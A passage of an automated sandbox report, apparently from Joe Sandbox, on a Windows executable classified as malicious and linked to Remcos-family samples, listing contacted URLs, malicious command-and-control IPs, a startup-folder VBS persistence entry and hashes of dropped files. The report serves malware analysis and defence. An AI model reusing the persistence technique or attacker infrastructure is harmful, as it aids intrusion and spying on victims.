http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com	svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://rum8.perf.linkedin.com/apc/trans.gif?fe61b216ccbcc1bca02cb20f2e94fb51	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com	svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?a9bddedb22fa9ee1d455a5d5a89b950c	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gp/C	name.exe, 00000005.00000002.2821566748.0000000003F20000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.2876639458.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://maps.windows.com/windows-app-web-link	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://cxcs.microsoft.net/api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&plat	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://fp-afdx-bpdee4gtg6frejfd.z01.azurefd.net/apc/trans.gif?60caefc8ca640843bccad421cfaadcc8	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://login.yahoo.com/config/login	svchost.exe	false	Avira URL Cloud: safe	unknown
http://www.nirsoft.net/	svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ow1.res.office365.com/apc/trans.gif?17a81fd4cdc7fc73a2b4cf5b67ff816d	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://86dd05e6f545b5502aade4a1946d3e9d.azr.footprintdns.com/apc/trans.gif?f67d919da1a9ba8a5672367d	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://www.office.com/	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://ow1.res.office365.com/apc/trans.gif?2f153f40414852a5ead98f4103d563a8	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?a176b93f037f93b5720edf68	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?909b77fc750668f20e07288ff0ed43e2	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?c9b5e9d2b836931c8ddd4e8d	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://18a72a1f5c7b170c6cc0a459d463264e.azr.footprintdns.com/apc/trans.gif?18b635b804a8d6ad0a1fa437	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
http://www.imvu.com	svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=wsb	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://acae307a6acdd4e64531be6276770618.azr.footprintdns.com/apc/trans.gif?467894188c5d788807342326	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
http://geoplugin.net/json.gpSystem32	svchost.exe, 00000006.00000002.2877479755.0000000003077000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?1c89d9658c6af83a02d98b03	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingaot	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://login.windows.net/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3-4102-ae	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://4c4f378c706610974da9cb9d99fe3116.azr.footprintdns.com/apc/trans.gif?74b620657ac570f7999e6ad7	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://ecs.nel.measure.office.net?TenantId=Skype&DestinationEndpoint=Edge-Prod-BL2r8e&FrontEnd=AFD	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://aefd.nelreports.net/api/report?cat=bingrms	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://rum8.perf.linkedin.com/apc/trans.gif?690daf9375f3d267a5b7b08fbc174993	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://www.google.com/accounts/servicelogin	svchost.exe	false	Avira URL Cloud: safe	unknown
https://58293426822f9aaf9d7c729f28294583.azr.footprintdns.com/apc/trans.gif?cf2d8bf3b68a3e37eef992d5	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.com/common/oauth2/authorize?response_type=code&client_id=d3590ed6-52b3	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://ow1.res.office365.com/apc/trans.gif?a50e32ebd978eda4d21928b1dbc78135	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
https://sin06prdapp01-canary-opaph.netmon.azure.com/apc/trans.gif?c6931b9e725f95cf9c20849dd6498c59	bhv5230.tmp.7.dr	false	Avira URL Cloud: safe	unknown
http://www.ebuddy.com	svchost.exe, 00000006.00000002.2878530155.0000000005D20000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000009.00000002.2854252619.0000000000400000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
107.175.229.139	unknown	United States		36352	AS-COLOCROSSINGUS	true
178.237.33.50	geoplugin.net	Netherlands		8455	ATOM86-ASATOM86NL	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1466891
Start date and time:	2024-07-03 14:48:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	14
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	cnaniAxghZ.exe renamed because original name is a hash value
Original Sample Name:	9993b780d61a1d757de704d2b6459cbac20803e5e2a2374cbea719aaadbb1344.exe
Detection:	MAL
Classification:	mal100.rans.phis.troj.spyw.expl.evad.winEXE@12/14@1/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 58 Number of non-executed functions: 273
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: cnaniAxghZ.exe

Simulations

Behavior and APIs

Time	Type	Description
13:50:57	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.vbs

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
107.175.229.139	REM6789098756GHUITR.bat.exe	Get hash	malicious	Remcos	Browse
	GF87654456789900..DOC.exe	Get hash	malicious	Remcos, DBatLoader	Browse
	z24FATUR8767909876500.exe	Get hash	malicious	Remcos	Browse
	FATCR09867000000.exe	Get hash	malicious	Remcos	Browse
	HGTQP09643009.scr.exe	Get hash	malicious	Remcos, DBatLoader, PrivateLoader	Browse
	z49factura098765679000.bat.exe	Get hash	malicious	Remcos, PrivateLoader	Browse
	#U00dcberpr#U00fcfen Sie Ihre_INV-2087_A97OPY7R#4DE688II65-DHL.scr.exe	Get hash	malicious	Remcos, PrivateLoader	Browse
	z97FDREMCO00000HJ.bat.exe	Get hash	malicious	Remcos, PrivateLoader	Browse
	VNNctWOjel.exe	Get hash	malicious	Remcos	Browse
	0876543456700076.xlam.xlsx	Get hash	malicious	Remcos, DBatLoader	Browse
178.237.33.50	xBkOubR0eL.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	PO#2195112.vbs	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	TT_Payment_Slip.bat.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	SOA.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	PAYMENT COPY.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	STATEMENT OF ACCOUNT.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	Requirement reference for quotation.exe	Get hash	malicious	Remcos	Browse	geoplugin.net/json.gp
	STATEMENT OF ACCOUNT.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp
	710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse	geoplugin.net/json.gp
	SOA.vbs	Get hash	malicious	Remcos, GuLoader	Browse	geoplugin.net/json.gp

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
geoplugin.net	xBkOubR0eL.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO#2195112.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	TT_Payment_Slip.bat.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	SOA.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	PAYMENT COPY.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	STATEMENT OF ACCOUNT.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	Requirement reference for quotation.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	STATEMENT OF ACCOUNT.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse	178.237.33.50
	SOA.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	execute_and_cleanup.sh	Get hash	malicious	Unknown	Browse	108.174.58.28
	4YlwTsmpuZ.rtf	Get hash	malicious	Unknown	Browse	23.95.235.16
	Payment_Advice.xls	Get hash	malicious	Unknown	Browse	192.3.179.150
	DHL_AWB 98776013276.xls	Get hash	malicious	FormBook	Browse	23.95.235.16
	Scan-Payment-Advice.xls	Get hash	malicious	Lokibot	Browse	198.46.178.137
	orden de compra.xlam.xlsx	Get hash	malicious	AgentTesla	Browse	192.3.243.156
	ORDER-7019-2024.js	Get hash	malicious	AgentTesla	Browse	192.210.215.11
	PO-24701248890.js	Get hash	malicious	WSHRat	Browse	192.210.215.11
	FedEx Receipt_53065724643.xls	Get hash	malicious	FormBook	Browse	23.95.235.16
	statement .xls	Get hash	malicious	Unknown	Browse	23.95.235.16
ATOM86-ASATOM86NL	xBkOubR0eL.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	PO#2195112.vbs	Get hash	malicious	Remcos	Browse	178.237.33.50
	TT_Payment_Slip.bat.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	SOA.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	PAYMENT COPY.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	STATEMENT OF ACCOUNT.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	Requirement reference for quotation.exe	Get hash	malicious	Remcos	Browse	178.237.33.50
	STATEMENT OF ACCOUNT.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50
	710_SO_TO_CHITTAGONG1_CFS-SOE777_PKCGP2410001-AMD-8248-HBL_DRAFT.scr.exe	Get hash	malicious	DBatLoader, Remcos	Browse	178.237.33.50
	SOA.vbs	Get hash	malicious	Remcos, GuLoader	Browse	178.237.33.50

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Wed Jul 3 12:50:58 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	136134
Entropy (8bit):	1.758150023465077
Encrypted:	false
SSDEEP:	384:N2ySTSo9/jW5/0lr8GUifalODe2gui/xF38ccidja7H7Iad2+3xXxV:IzfxjW50SiZDvE98edja7bC+1
MD5:	5B9C30C5D5E086087CCB9AB8A04ADF83
SHA1:	62A5C240F14AEA2F8A63EB99C8D68A0EA29EEEB3
SHA-256:	61F846A2085653BA12EC3CEE9A38691BA0A6FC4BDEE6A41A0F5877094D3EC25A
SHA-512:	86B8F05DDC1B6B79010EF4D4098A3AD06035178E159D76EF0EDC90ACE5E33801234D7764E156E0AE9A8D44CD7E122975432590FFF5C1135C35B4AE1977868860
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... .......2I.f........................`................R..........T.......8...........T...........87............... ...........!..............................................................................eJ......."......GenuineIntel............T...........-I.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER559C.tmp.WERInternalMetadata.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8270
Entropy (8bit):	3.691040266903646
Encrypted:	false
SSDEEP:	192:R6l7wVeJzw6l6Y+n6G8bgmfpnEuZuprw89b5ksfmzm:R6lXJE6l6YO6hgmfpnEuZ25XfD
MD5:	E8EF4A1B2E4D62808527EDF85F8C7AFA
SHA1:	B6CCFA77CEA7A6BFD6C3B274DD017BF972A1820C
SHA-256:	AA43E00D7DEAA619FB10FAD1548492613082419CBD99109FE93F04582C9987F6
SHA-512:	7F0523E4780A8AEC56B2ECE728AAAB531617E4F6DBD0D21E2A90CB56749A74C5C54B9C2CEB8CD129E22AE8663FC096333A173445F5EAC352DC4384F4D0B1147E
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.8.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER55CC.tmp.xml

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4655
Entropy (8bit):	4.45073607594719
Encrypted:	false
SSDEEP:	48:cvIwWl8zsnJg77aI9lGnWpW8VYj3mYm8M4JCFLFN+q8+L/D0Dd:uIjfJI7/GW7VsPJC5vD0Dd
MD5:	CD525189B8258D49BDCFF228305EECEE
SHA1:	5E0A4FD2F42A8E52A055A904E21F04A642E43BA9
SHA-256:	A51D2918E644AF973E4627993F1075CDB5F78465006D80119AE040087205C477
SHA-512:	53FF3EE6E3EFC6F1B6888F7697FBD893DA240977BE50AAC8DD21934D730164BE3B7D4169236D71F9B190C7ABC3B17E7A142023420182922E43B03714251DCD05
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="394793" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

Process:	C:\Windows\SysWOW64\svchost.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	962
Entropy (8bit):	5.013811273052389
Encrypted:	false
SSDEEP:	12:tklu+mnd6CsGkMyGWKyGXPVGArwY307f7aZHI7GZArpv/mOAaNO+ao9W7iN5zzkk:qlu+KdRNuKyGX85jvXhNlT3/7AcV9Wro
MD5:	18BC6D34FABB00C1E30D98E8DAEC814A
SHA1:	D21EF72B8421AA7D1F8E8B1DB1323AA93B884C54
SHA-256:	862D5523F77D193121112B15A36F602C4439791D03E24D97EF25F3A6CBE37ED0
SHA-512:	8DF14178B08AD2EDE670572394244B5224C8B070199A4BD851245B88D4EE3D7324FC7864D180DE85221ADFBBCAACB9EE9D2A77B5931D4E878E27334BF8589D71
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{. "geoplugin_request":"8.46.123.33",. "geoplugin_status":200,. "geoplugin_delay":"1ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

C:\Users\user\AppData\Local\Temp\aut4129.tmp

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	427908
Entropy (8bit):	7.986103438642409
Encrypted:	false
SSDEEP:	12288:rTiI6RPFmNCjr9bILlTFrr0bR3VAdhnLTiTiJD94gHKvW:ncFmN4RbILlTJGVAjLW6IW
MD5:	186D4D6B81F5F8D23AB819A0D71F859E
SHA1:	CC3BE8C4D83C7C1422CD2173D4AE303AE4A7CF3E
SHA-256:	C628D0E71D3B24B1C81098C642C6025268A1E6BA165C2BAAC0F1D00EBB2C3DB1
SHA-512:	A41703C9805F81938F14B4BA59E1337B4E077525D5410E61ACED96C6B28E597BFA743C58F8E5664C5755B4BEF589177C2467B19F2193733BE7EFB3F68D60DA6B
Malicious:	false
Reputation:	low
Preview:	EA06.....@..z.j.8..(t....P.Q.:...D...J...0.P....\...~.%J.A......c........8.I.rI..G5......[..F$3[..C=.J&.H.6.v...k\|.kI..f......,$.....z.,.Q5.O.[..M0.K....;.%..:.4....az........\,..k..K .d.E..JiZ...I...'Z...%.....=....-.y..N/....M.."z.l.o..S.;.,.+=.O!:<.....A+4H]..V..4.`.]l.:.>.L.U.UJE..2...q....T..8.....0.T..J.N.D..@I.."....=r.T....uQ.p.3.E..@..j5.%\...0.^.uT..z..t....,....Q...R...W...O.!..V.....%6.@....Pm(.9.m.g1....I..V.P@.J...P...\|6:..m.M$...R...?19.L'.Z.......#....b.D#...J.V.W.........N8.l.K..k....B.U..M......V....K(.....(....Q(.`.6....A(.(..".H..K.`.T...5.p.IR...\|..-..(..'.......4.:.R...C+...N.A..z\|`a?@......b.ML..G.L..x.#W....p...Q...v?..}.Chz..>.P..=.......T.Uj.6o...!.J.B=...51k......#........y..W...*.Z.Z..P........X.uIM.w..l..."5...!.z...C.Pf09.....Y.t8.....E.....Y.E....C;~.Pm?.MC.'..T...A...~.`..i...5...j}]..u....}S..b.:>..`.Td....q..Y..HV_.!..([-..H..)....Aq.../.R...o.u.E.S.......T.f.....3...2.I..W........D.`f.l.&1...0wj.B_..Dh;

C:\Users\user\AppData\Local\Temp\aut4188.tmp

Process:	C:\Users\user\AppData\Local\directory\name.exe
File Type:	data
Category:	dropped
Size (bytes):	9932
Entropy (8bit):	7.595448806331314
Encrypted:	false
SSDEEP:	192:uitokLqcFEelaNFMKlGvYHbfqPK30zBh0qdYEf9UGCsdQbciHRLmgECq8:uiikLqcCelamQwK30zBIGLYFmgEp8
MD5:	E322D9C1E6723E07B9A8E60CE57CAE89
SHA1:	838EEED2BAF4E8EF013A4F73B1374FDC2C15C059
SHA-256:	A5486CDC1FCC8CFA321599381BF74E08F39B4E06F3F84AAB2A6F36219AE753F8
SHA-512:	202860CC2C4D2503B980287429AB036FDB5F68A0832EACDBB4EEB8D631ADB4475370C40D453ED85998DC3324DC127D2E706FEBF7317ABE621F69383F36AFCD9F
Malicious:	false
Reputation:	low
Preview:	EA06..t4..t...e4.L..9...8....)..E.P....aA..f.I..C..'3i..e1../.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,S....f.I...a..-vk5.........6.l,`........fs;....`....g.I......l..]..f.`...9\|....p.1..... ..$h.c.....#@...H,....`..k0.H.f. ...<zk5....!9.B...3p.n.f.I..q7.t.,. ....4....`....8.........c....P....0.... ..Y@....../Z..-zs5...jq7...zl........V....#.p..N&...M.^.9.....7.:..w.......7...}3p#..oc...f.P./....J.v.5..@{...........a..f.....`.Y..`...&.......x...u\| .....Y,@=.%.d....&.)...,S`./..8....@..%....Y@..;...#.Y,s ./.k5...4.;...K.4\|.;..g.c....c..&.i....x.&.k...c.Y'3Y...@}.4..3.....33...se.M'.@C`..s....e.,..h........Y.......Y.$.p.Y...f.e...8.....2...@.;1.X.`..L' ..........@.37.Ll.K.......9d..,vd.....i2........#. ....3a..g.`j.....Bvf.....@R...m8.4@9..NL..;3.X.l.:M. ..........c.@.......d.... ......8.a...f.X.B)..'f......j.a...0..s5..Bvj........;...N..;6.X...Cv }.....'.<..L..8.....f.L..@....`...f..!...&s...j...B;7.X...c

C:\Users\user\AppData\Local\Temp\aut708F.tmp

Process:	C:\Users\user\Desktop\cnaniAxghZ.exe
File Type:	data
Category:	dropped
Size (bytes):	427908
Entropy (8bit):	7.986103438642409
Encrypted:	false
SSDEEP:	12288:rTiI6RPFmNCjr9bILlTFrr0bR3VAdhnLTiTiJD94gHKvW:ncFmN4RbILlTJGVAjLW6IW
MD5:	186D4D6B81F5F8D23AB819A0D71F859E
SHA1:	CC3BE8C4D83C7C1422CD2173D4AE303AE4A7CF3E
SHA-256:	C628D0E71D3B24B1C81098C642C6025268A1E6BA165C2BAAC0F1D00EBB2C3DB1
SHA-512:	A41703C9805F81938F14B4BA59E1337B4E077525D5410E61ACED96C6B28E597BFA743C58F8E5664C5755B4BEF589177C2467B19F2193733BE7EFB3F68D60DA6B
Malicious:	false
Reputation:	low
Preview:	EA06.....@..z.j.8..(t....P.Q.:...D...J...0.P....\...~.%J.A......c........8.I.rI..G5......[..F$3[..C=.J&.H.6.v...k\|.kI..f......,$.....z.,.Q5.O.[..M0.K....;.%..:.4....az........\,..k..K .d.E..JiZ...I...'Z...%.....=....-.y..N/....M.."z.l.o..S.;.,.+=.O!:<.....A+4H]..V..4.`.]l.:.>.L.U.UJE..2...q....T..8.....0.T..J.N.D..@I.."....=r.T....uQ.p.3.E..@..j5.%\...0.^.uT..z..t....,....Q...R...W...O.!..V.....%6.@....Pm(.9.m.g1....I..V.P@.J...P...\|6:..m.M$...R...?19.L'.Z.......#....b.D#...J.V.W.........N8.l.K..k....B.U..M......V....K(.....(....Q(.`.6....A(.(..".H..K.`.T...5.p.IR...\|..-..(..'.......4.:.R...C+...N.A..z\|`a?@......b.ML..G.L..x.#W....p...Q...v?..}.Chz..>.P..=.......T.Uj.6o...!.J.B=...51k......#........y..W...*.Z.Z..P........X.uIM.w..l..."5...!.z...C.Pf09.....Y.t8.....E.....Y.E....C;~.Pm?.MC.'..T...A...~.`..i...5...j}]..u....}S..b.:>..`.Td....q..Y..HV_.!..([-..H..)....Aq.../.R...o.u.E.S.......T.f.....3...2.I..W........D.`f.l.&1...0wj.B_..Dh;

C:\Users\user\AppData\Local\Temp\aut70DE.tmp

Process:	C:\Users\user\Desktop\cnaniAxghZ.exe
File Type:	data
Category:	dropped
Size (bytes):	9932
Entropy (8bit):	7.595448806331314
Encrypted:	false
SSDEEP:	192:uitokLqcFEelaNFMKlGvYHbfqPK30zBh0qdYEf9UGCsdQbciHRLmgECq8:uiikLqcCelamQwK30zBIGLYFmgEp8
MD5:	E322D9C1E6723E07B9A8E60CE57CAE89
SHA1:	838EEED2BAF4E8EF013A4F73B1374FDC2C15C059
SHA-256:	A5486CDC1FCC8CFA321599381BF74E08F39B4E06F3F84AAB2A6F36219AE753F8
SHA-512:	202860CC2C4D2503B980287429AB036FDB5F68A0832EACDBB4EEB8D631ADB4475370C40D453ED85998DC3324DC127D2E706FEBF7317ABE621F69383F36AFCD9F
Malicious:	false
Reputation:	low
Preview:	EA06..t4..t...e4.L..9...8....)..E.P....aA..f.I..C..'3i..e1../.Y...e..&6[...0.L..I..k7.N&. ..a0.M.....q4.Nf.P.....K..d.%...p.lY@.......c.Xf.0.o..b.L.`...,S....f.I...a..-vk5.........6.l,`........fs;....`....g.I......l..]..f.`...9\|....p.1..... ..$h.c.....#@...H,....`..k0.H.f. ...<zk5....!9.B...3p.n.f.I..q7.t.,. ....4....`....8.........c....P....0.... ..Y@....../Z..-zs5...jq7...zl........V....#.p..N&...M.^.9.....7.:..w.......7...}3p#..oc...f.P./....J.v.5..@{...........a..f.....`.Y..`...&.......x...u\| .....Y,@=.%.d....&.)...,S`./..8....@..%....Y@..;...#.Y,s ./.k5...4.;...K.4\|.;..g.c....c..&.i....x.&.k...c.Y'3Y...@}.4..3.....33...se.M'.@C`..s....e.,..h........Y.......Y.$.p.Y...f.e...8.....2...@.;1.X.`..L' ..........@.37.Ll.K.......9d..,vd.....i2........#. ....3a..g.`j.....Bvf.....@R...m8.4@9..NL..;3.X.l.:M. ..........c.@.......d.... ......8.a...f.X.B)..'f......j.a...0..s5..Bvj........;...N..;6.X...Cv }.....'.<..L..8.....f.L..@....`...f..!...&s...j...B;7.X...c

C:\Users\user\AppData\Local\Temp\bhv5230.tmp

Process:	C:\Windows\SysWOW64\svchost.exe
